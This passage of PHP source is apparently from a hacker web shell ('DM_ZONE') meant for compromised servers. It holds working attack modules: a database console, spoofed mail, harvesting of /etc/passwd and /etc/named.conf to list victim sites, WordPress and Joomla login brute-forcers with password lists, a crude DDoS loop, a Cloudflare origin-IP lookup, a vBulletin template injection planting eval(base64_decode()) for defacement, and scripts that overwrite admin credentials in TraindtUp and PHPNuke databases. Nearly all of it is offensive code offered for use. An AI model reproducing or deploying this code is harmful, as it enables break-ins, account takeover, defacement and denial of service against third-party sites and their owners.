  3445. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  3446. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  3447. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  3448. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  3449. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  3450. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  3451. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p></form></div> ";
  3452. @mysql_select_db($db);
  3453. $querys = explode(";",$query); foreach($querys as $query){
  3454. if(trim($query) != ""){
  3455. $hasil = mysql_query($query);
  3456.  
  3457. if($hasil){
  3458. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  3459. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  3460. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  3461. for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  3462. $msg .= "</tr>";
  3463. for($i=0;$i<@mysql_num_rows($hasil);$i++) {
  3464. $rows=@mysql_fetch_array($hasil);
  3465. $msg .= "<tr>";
  3466. for($j=0;$j<@mysql_num_fields($hasil);$j++) {
  3467. if($rows[$j] == "") $dataz = "&nbsp;";
  3468. else $dataz = $rows[$j];
  3469. $msg .= "<td>".$dataz."</td>";
  3470. }
  3471. $msg .= "</tr>";
  3472. }
  3473. $msg .= "</table>";
  3474. }
  3475. else
  3476. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  3477. }
  3478. }
  3479. }
  3480. else {
  3481. $query = "SHOW PROCESSLIST;\n SHOW VARIABLES;\n SHOW STATUS;";
  3482. $msg = "<div style=\"width:99%;padding:0 10px;\">
  3483. <form action=\"?\" method=\"get\">
  3484. <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
  3485. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  3486. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  3487. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  3488. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  3489. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  3490. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  3491. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  3492. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  3493. </form></div> ";
  3494.  
  3495. $dbs = array();
  3496. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  3497. $hasil = @mysql_list_dbs($con);
  3498. while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
  3499. @sort($dbs);
  3500. foreach($dbs as $db){
  3501. $msg .= "<tr><td><a href=\"?dm=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  3502. }
  3503. $msg .= "</table>";
  3504. }
  3505. @mysql_close($con);
  3506. }
  3507. else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  3508. echo $msg;
  3509. }
  3510. else{
  3511. ?>
  3512. <form action="?" method="get">
  3513. <input type="hidden" name="dm" value="<?php echo $pwd; ?>" />
  3514. <input type="hidden" name="x" value="mysql" />
  3515. <table class="tabnet" style="width:300px;">
  3516. <tr>
  3517. <th colspan="2">Connect to mySQL server</th>
  3518. </tr>
  3519. <tr>
  3520. <td>&nbsp;&nbsp;Host</td>
  3521. <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
  3522. <tr>
  3523. <td>&nbsp;&nbsp;Username</td>
  3524. <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
  3525. <tr>
  3526. <td>&nbsp;&nbsp;Password</td>
  3527. <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
  3528. <tr>
  3529. <td>&nbsp;&nbsp;Port</td>
  3530. <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  3531. </tr></table></form>
  3532.  
  3533. <?php } }
  3534. elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')) {
  3535. if(isset($_POST['mail_send'])) {
  3536. $mail_to = $_POST['mail_to'];
  3537. $mail_from = $_POST['mail_from'];
  3538. $mail_subject = $_POST['mail_subject'];
  3539. $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
  3540. { $msg = "email sent to $mail_to"; }
  3541. else $msg = "send email failed";
  3542. }
  3543. ?>
  3544. <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  3545. <table class="cmdbox"> <tr>
  3546. <td><textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea></td></tr>
  3547. <tr>
  3548. <td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to</td></tr>
  3549. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="gue@ganteng.com" name="mail_from" />&nbsp; from</td></tr>
  3550. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>
  3551. <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr>
  3552. <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?>
  3553. </td></tr>
  3554. </table> </form>
  3555.  
  3556.  
  3557. <?php }
  3558. #x=jumping
  3559. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')) { ?>
  3560.  
  3561. <form action="?dm=<?php echo $pwd; ?>&amp;x=jumping" method="post">
  3562.  
  3563. <?php
  3564. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<center><br/><br/><nobr><span class=b9>SAFE MODE ON</span></nobr><br/><br/></center> ');
  3565. set_time_limit(0);
  3566. @$passwd = fopen('/etc/passwd-','r');
  3567. if (!$passwd) {
  3568. die('<center><br/><br/><nobr><span class=b9>READ ETC/PASSWD- NOT AVAILABLE</span></nobr><br/><br/></center>');
  3569. }
  3570. $pub = array();
  3571. $users = array();
  3572. $conf = array();
  3573. $i = 0;
  3574. while(!feof($passwd)) {
  3575. $str = fgets($passwd);
  3576. if ($i > 10) {
  3577. $pos = strpos($str,':');
  3578. $username = substr($str,0,$pos);
  3579. $dirz = '/home/'.$username.'/public_html/';
  3580. if (($username != '')) {
  3581. if (is_readable($dirz)) {
  3582. array_push($users,$username);
  3583. array_push($pub,$dirz);
  3584. }
  3585. }
  3586. }
  3587. $i++;
  3588. }
  3589. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ READABLE</span> <span class='b8'>PUBLIC_HTML ]:=O</span></b></nobr><br/><br/><table align='center' border='3' width='200' cellspacing='0' cellpadding='0'>
  3590. <tr><th><b>TOTAL : ".sizeof($pub)." TARGET VICTIM"."</th></tr>";
  3591. foreach ($users as $user) {
  3592. $path = "/home/$user/public_html/";
  3593. echo "<tr>";
  3594. echo "<td><a href='?dm=$path' target='_blank' style='font-weight:bold; color:#FFFFFF;'>$path</td>";
  3595. }
  3596. echo "</tr>";
  3597. echo "</table></center></body></html>";
  3598. }
  3599.  
  3600. # x=domain
  3601. elseif(isset($_GET['x']) && ($_GET['x'] == 'domain')) { ?>
  3602. <form action="?dm=<?php echo $pwd; ?>&amp;x=domain" method="post">
  3603.  
  3604. <?php
  3605. echo '<br><br></center><br><br><div class=content>';
  3606. $file = @implode(@file("/etc/named.conf"));
  3607. if(!$file){ die("can't ReaD -> [ /etc/named.conf ");
  3608. }
  3609. preg_match_all("#named/(.*?).db#",$file ,$r);
  3610. $domains = array_unique($r[1]);
  3611. //check();
  3612. //if(isset($_GET['ShowAll']))
  3613. {
  3614. echo "<table align=center border=1 width=59% cellpadding=5>
  3615. <tr><td colspan=2>[+] ADA [ <b>".count($domains)."</b> ] DOMAIN</td></tr>
  3616. <tr><td>Domain</td><td>User</td></tr>";
  3617. foreach($domains as $domain){
  3618. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  3619. echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
  3620. }
  3621. echo "</table>";
  3622. }
  3623. echo '</div>';
  3624. }
  3625.  
  3626.  
  3627. # x=crypter
  3628. elseif(isset($_GET['x']) && ($_GET['x'] == 'crypter')) {
  3629. $submit= $_POST['enter'];
  3630. $pass = $_POST['password'];
  3631.  
  3632. if(isset($submit)) {
  3633. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN';
  3634. $hash = md5($pass);
  3635. $hash_md5 = md5($salt.$pass);
  3636. $hash_md5_double = md5(sha1($salt.$pass));
  3637. $hash1 = sha1($pass);
  3638. $hash1_sha1 = sha1($salt.$pass);
  3639. $hash1_sha1_double = sha1(md5($salt.$pass));
  3640. }
  3641. echo '<form action="" method="post"><b><table class=tabnet>';
  3642. echo '<tr><th colspan="2">Password Hash</th></center></tr>';
  3643. echo '<tr><td><b>Masukan Kata : </b></td>';
  3644. echo '<td><input class="inputz" type="text" name="password" size="40" />';
  3645. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
  3646. echo '</td></tr><br>';
  3647. echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
  3648. echo '<tr><td>Original</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
  3649. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
  3650. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
  3651. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
  3652. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
  3653. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
  3654. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
  3655. }
  3656.  
  3657.  
  3658. # x=wp1
  3659. elseif(isset($_GET['x']) && ($_GET['x'] == 'wp1')) { ?>
  3660. <form action="?dm=<?php echo $pwd; ?>&amp;x=wp1" method="post">
  3661.  
  3662. <center><br/><br/>
  3663. <form enctype="multipart/form-data" method="POST">
  3664. <table width='624' border='0' class='tabnet' id='Box'>
  3665. <tr><th colspan="5">Wordpress Brute Force</th></tr>
  3666. <tr><td >&nbsp;</td>
  3667. <td><p>Hosts:</p></td>
  3668. <td><p>Users:</p></td>
  3669. <td><p>Passwords:</p></td></tr>
  3670. <tr><td>&nbsp;</td>
  3671. <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
  3672. <td><textarea style="background:black;" name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
  3673. <td ><textarea style="background:black;" name="passwords" cols="30" rows="10" >
  3674.  
  3675. <?php if($_POST){echo$_POST['passwords'];}else {echo"admin\nadministrator\nadmin123\nqwerty\n123qwerty\nqwerty12345\n123admin\12345admin\nqwe123rty\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";}?></textarea></td></tr>
  3676. <tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now" />
  3677. <?php
  3678. if($_POST){
  3679. $hosts = trim(filter($_POST['hosts']));
  3680. $passwords = trim(filter($_POST['passwords']));
  3681. $usernames = trim(filter($_POST['usernames']));
  3682.  
  3683. if($passwords && $usernames && $hosts)
  3684. {
  3685. $hosts_explode = explode("\n", $hosts);
  3686. $usernames_explode = explode("\n", $usernames);
  3687. $passwords_explode = explode("\n", $passwords);
  3688.  
  3689. foreach($hosts_explode as $host)
  3690. {
  3691. $host = RemoveLastSlash($host);
  3692. $hacked = 0;
  3693. $host = str_replace(array("http://","https://","www."),"",trim($host));
  3694. $host = "http://".$host;
  3695. $wpAdmin = $host.'/wp-admin/';
  3696.  
  3697. if(!url_exists($host."/wp-login.php"))
  3698. {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";
  3699. ob_flush();
  3700. flush();
  3701. continue;
  3702. }
  3703. foreach($usernames_explode as $username)
  3704. {
  3705. foreach($passwords_explode as $password)
  3706. {
  3707. $ch = curl_init();
  3708. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  3709. curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
  3710. curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
  3711. curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
  3712. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  3713. curl_setopt($ch,CURLOPT_POST,TRUE);
  3714. curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");
  3715. $login =curl_exec($ch);
  3716.  
  3717. if(eregi("profile.php",$login)) {
  3718. $hacked = 1;
  3719. echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
  3720. ob_flush();
  3721. flush();
  3722. break;
  3723. }
  3724. }
  3725. if($hacked == 1){break;}
  3726. }
  3727. if($hacked == 0)
  3728. {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
  3729. }
  3730. }
  3731. else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
  3732. }
  3733. ?>
  3734. </td></tr>
  3735. </table></form></center>
  3736. <?php
  3737. function url_exists($strURL) {
  3738. $resURL = curl_init();
  3739. curl_setopt($resURL, CURLOPT_URL, $strURL);
  3740. curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
  3741. curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
  3742. curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
  3743. curl_exec ($resURL);
  3744.  
  3745. $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
  3746. curl_close ($resURL);
  3747.  
  3748. if ($intReturnCode != 200){return false;} else {return true ;}
  3749. }
  3750. function filter($string)
  3751. {
  3752. if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
  3753. else{return $string; }
  3754. }
  3755. function RemoveLastSlash($host)
  3756. {
  3757. if(strrpos($host, '/', -1) == strlen($host)-1)
  3758. {return substr($host,0,strrpos($host, '/', -1));}
  3759. else{return $host;}
  3760. }
  3761. echo "</p>";
  3762. }
  3763.  
  3764. # x=jm1
  3765. elseif(isset($_GET['x']) && ($_GET['x'] == 'jm1')) { ?>
  3766. <form action="?dm=<?php echo $pwd; ?>&amp;x=jm1" method="post">
  3767. <center><br /><br />
  3768. <form method="post" action="" enctype="multipart/form-data">
  3769. <table class="tabnet" width="38%" border="0"><center>
  3770. <th colspan="2">Joomla Brute Force</th>
  3771. <tr>
  3772. <td><p ><font class="d1">User :</font></th>
  3773. <input class="inputz" type='text' name="usr" value="admin" size="15"> </font></center><br /><br /></p>
  3774. </td></tr>
  3775. <tr><td><font class="">Sites list :</font>
  3776. </td><td><font class="" >Pass list :</font></td></tr>
  3777. <tr><td>
  3778. <textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>
  3779. </td><td>
  3780. <textarea name="w0rds" style="background:black;" cols="40" rows="13" >
  3781. admin
  3782. 123qwe456rty
  3783. qwerty
  3784. fuck
  3785. administrator
  3786. passjomla
  3787. adminpass
  3788. 123456
  3789. password
  3790. 102030
  3791. 123123
  3792. 12345
  3793. 123456789
  3794. pass
  3795. test
  3796. admin123
  3797. demo
  3798. !@#$%^</textarea>
  3799. </td></tr><center><tr><td>
  3800. <font >
  3801. <input class="inputzbut" type="submit" name="x" value=" >> " id="d4">
  3802. </font></td></tr><br><br></center></table>
  3803. </form></center>
  3804. <?
  3805. @set_time_limit(0);
  3806.  
  3807. if($_POST['x']){
  3808. echo "<hr>";
  3809. $sites = explode("\n",$_POST["sites"]);
  3810. $w0rds = explode("\n",$_POST["w0rds"]);
  3811. $Attack = new Joomla_brute_Force();
  3812. foreach($w0rds as $pwd){
  3813. foreach($sites as $site){
  3814. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd));
  3815. flush();flush();
  3816. } } }
  3817.  
  3818.  
  3819. function txt_cln($value) {
  3820. return str_replace(array("\n","\r"),"",$value);
  3821. }
  3822.  
  3823. class Joomla_brute_Force{
  3824. public function check_it($site,$user,$pass){
  3825.  
  3826. if(eregi('com_config',$this->post($site,$user,$pass))){
  3827. echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>";
  3828. $f = fopen("Result.txt","a+");
  3829. fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n");
  3830. fclose($f);
  3831. flush();
  3832. } else {
  3833. echo "# Failed : $user:$pass -> $site<BR>"; flush();
  3834. }
  3835. }
  3836.  
  3837. public function post($site,$user,$pass){
  3838. $token = $this->extract_token($site);
  3839. $curl=curl_init();
  3840.  
  3841. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  3842. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
  3843. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  3844. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  3845. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  3846. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  3847. curl_setopt($curl,CURLOPT_POST,1);
  3848. curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
  3849. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  3850.  
  3851. $exec=curl_exec($curl);
  3852. curl_close($curl);
  3853. return $exec;
  3854. }
  3855.  
  3856. public function extract_token($site){
  3857. $source = $this->get_source($site);
  3858. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
  3859. return $token[1][0];
  3860. }
  3861.  
  3862. public function get_source($site){
  3863. $curl=curl_init();
  3864. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  3865. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
  3866. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  3867. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  3868. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  3869. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  3870. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  3871.  
  3872. $exec=curl_exec($curl);
  3873. curl_close($curl);
  3874. return $exec;
  3875. }
  3876. }
  3877. }
  3878.  
  3879.  
  3880.  
  3881. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpddos')) {
  3882. ?>
  3883. <form action="?dm=<?php echo $pwd; ?>&amp;x=phpddos" method="post">
  3884.  
  3885.  
  3886. <?php
  3887.  
  3888. echo $head.$formg.$nowaddress.'<br><br><br><title>-=[ Ddos tool ]=-</title><br><br><table class="tabnet" ><b><p align="center">Address : <input class=inputz name=urldd0 size=50> Time : <input class=inputz name=timedd0 size=6 value=40000></b><br><input class="inputzbut"type=submit value=" Get Fire!!! "></form></p></table>'.$end;exit;
  3889.  
  3890.  
  3891.  
  3892. if($_GET['urldd0'] && $_GET['timedd0']){
  3893. for ($id=0;$$id<$_GET['timedd0'];$id++){
  3894. $fp=null;
  3895. $contents=null;
  3896. $fp=fopen($_GET['urldd0'],"rb");
  3897.  
  3898. while (!feof($fp)) {
  3899.  
  3900. $contents .= fread($fp, 8192);
  3901. }
  3902. fclose($fp);
  3903. }
  3904. }
  3905. }
  3906.  
  3907.  
  3908.  
  3909. # x=cloud
  3910. elseif(isset($_GET['x']) && ($_GET['x'] == 'cf')){
  3911. echo '<center><br/><br/>
  3912. <form method="POST">
  3913. <select class="inputz" name="krz">
  3914. <option>FTP</option>
  3915. <option>DIRECT</option>
  3916. <option>WEBMAIL</option>
  3917. <option>CPANEL</option></select>
  3918.  
  3919. <input class="inputz" type="text" name="target" value="url">
  3920. <input class="inputzbut" type="submit" value=" >> "></center>';
  3921.  
  3922.  
  3923. $target = $_POST['target'];
  3924.  
  3925. if($_POST['krz'] == "ftp") {
  3926. $ftp = gethostbyname("ftp."."$target");echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  3927. Ip Is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
  3928. }
  3929.  
  3930. if($_POST['krz'] == "direct-connect") {
  3931. $direct = gethostbyname("direct-connect."."$target");
  3932. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  3933. Ip Is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
  3934. }
  3935.  
  3936. if($_POST['krz'] == "webmail") {
  3937. $web = gethostbyname("webmail."."$target");
  3938. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  3939. Ip Is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
  3940. }
  3941.  
  3942. if($_POST['krz'] == "cpanel") {
  3943. $cpanel = gethostbyname("cpanel."."$target");
  3944. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  3945. Ip Is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
  3946. }
  3947. }
  3948.  
  3949.  
  3950. # x=vb1
  3951. elseif(isset($_GET['x']) && ($_GET['x'] == 'vb1')){
  3952. ?>
  3953. <form action="?dm=<?php echo $pwd; ?>&amp;x=vb1" method="post">
  3954.  
  3955.  
  3956. <br><br><br><div align="center">
  3957. <?php
  3958. if(empty($_POST['index'])){
  3959. echo "<center><form method=\"POST\">
  3960. DB Host : <input size=\"15\" value=\"localhost\" style='color:#FF0000;background-color:#000000' name=\"localhost\" type=\"text\"><br>
  3961. DB Name : <input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"database\" type=\"text\"><br>
  3962. DB User : <input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"username\" type=\"text\"><br>
  3963. DB Pass : <input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"password\" type=\"text\"><br>
  3964. <br>
  3965. <textarea name=\"index\" cols=\"100\" rows=\"20\">[+] HALAMAN INDEX DEFACE [+]</textarea><br>
  3966. <input value=\" >> \" style='color:#FF0000;background-color:#000000' name=\"send\" type=\"submit\">
  3967. </form></center>";
  3968. }else{
  3969. $localhost = $_POST['localhost'];
  3970. $database = $_POST['database'];
  3971. $username = $_POST['username'];
  3972. $password = $_POST['password'];
  3973. $index = $_POST['index'];
  3974. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  3975. @mysql_select_db($database) or die(mysql_error());
  3976.  
  3977. $index=str_replace("\'","'",$index);
  3978.  
  3979. $set_index = "{\${eval(base64_decode(\'";
  3980.  
  3981. $set_index .= base64_encode("echo \"$index\";");
  3982.  
  3983.  
  3984. $set_index .= "\'))}}{\${exit()}}</textarea>";
  3985.  
  3986. echo("UPDATE template SET template ='".$set_index."' ") ;
  3987. $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
  3988.  
  3989. if($ok){
  3990. echo "!! update finish !!<br><br>";
  3991. }
  3992. }
  3993. }
  3994.  
  3995. // x=traindt
  3996. elseif(isset($_GET['x']) && ($_GET['x'] == 'traindt')) {
  3997. // password changer
  3998. ?>
  3999. <form action="?dm=<?php echo $pwd; ?>&amp;x=traindt" method="post">
  4000.  
  4001. <?php
  4002. echo "<html><head><title>TraindtUpLoginChanger</title></head>";
  4003. echo "<body><center>
  4004. <h2>^_^ DM_ZONE ^_^</h2>
  4005. <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
  4006. <form method=POST action=''>
  4007. DB HOST<br/>
  4008. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  4009. DB NAME<br/>
  4010. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  4011. DB USER<br/>
  4012. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  4013. DB PASSWORD<br/>
  4014. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  4015. <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
  4016. <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
  4017. NEW ADMIN LOGIN USER<br/>
  4018. <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  4019. NEW ADMIN LOGIN PASS<br/>
  4020. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  4021.  
  4022. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  4023.  
  4024. $anu1 = $_POST['anu1'];
  4025. $anu2 = $_POST['anu2'];
  4026. $anu3 = $_POST['anu3'];
  4027. $anu4 = $_POST['anu4'];
  4028. @mysql_connect($anu1,$anu3,$anu4);
  4029. @mysql_select_db($anu2);
  4030.  
  4031. $idmaho=str_replace("\'","'",$idmaho);
  4032. $target_id = $_POST['idmaho'];
  4033.  
  4034. $userbaru=str_replace("\'","'",$userbaru);
  4035. $ganti_user = $_POST['userbaru'];
  4036.  
  4037. $passbaru=str_replace("\'","'",$passbaru);
  4038. $hash_pass = $_POST['passbaru'];
  4039. $ganti_pass = md5($hash_pass);
  4040.  
  4041. $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
  4042. $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
  4043.  
  4044. $oke=@mysql_query($sodok1);
  4045. $oke=@mysql_query($sodok2);
  4046. if($oke)
  4047. {
  4048. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  4049. }
  4050. }
  4051.  
  4052. // x=nuke
  4053. elseif(isset($_GET['x']) && ($_GET['x'] == 'nuke')) {
  4054. // password changer
  4055. ?>
  4056. <form action="?dm=<?php echo $pwd; ?>&amp;x=nuke" method="post">
  4057.  
  4058. <?php
  4059. echo "<html><head><title>PHPNukeLoginChanger</title></head>";
  4060. echo "<body><center>
  4061. <h2>^_^ DM_ZONE ^_^</h2>
  4062. <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
  4063. <form method=POST action=''>
  4064. DB HOST<br/>
  4065. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  4066. DB NAME<br/>
  4067. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  4068. DB USER<br/>
  4069. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  4070. DB PASSWORD<br/>
  4071. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  4072. <hr style='color:lime;'>
  4073.  
  4074. TARGET PREFIX<br/>
  4075. <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
  4076. NEW ADMIN LOGIN USER<br/>
  4077. <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  4078. NEW ADMIN LOGIN PASS<br/>
  4079. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  4080.  
  4081. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  4082.  
  4083. $anu1 = $_POST['anu1'];
  4084. $anu2 = $_POST['anu2'];
  4085. $anu3 = $_POST['anu3'];
  4086. $anu4 = $_POST['anu4'];
  4087. @mysql_connect($anu1,$anu3,$anu4);
  4088. @mysql_select_db($anu2);
  4089.  
  4090. $userbaru=str_replace("\'","'",$userbaru);
  4091. $ganti_user = $_POST['userbaru'];
  4092. $passbaru=str_replace("\'","'",$passbaru);
  4093. $hash_pass = $_POST['passbaru'];
  4094. $ganti_pass = md5($hash_pass);
  4095.  
  4096. $prefix = $_POST['prefix'];
  4097. $table_name1 = $prefix."users" ;
  4098. $table_name2 = $prefix."authors" ;
  4099.  
  4100. $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
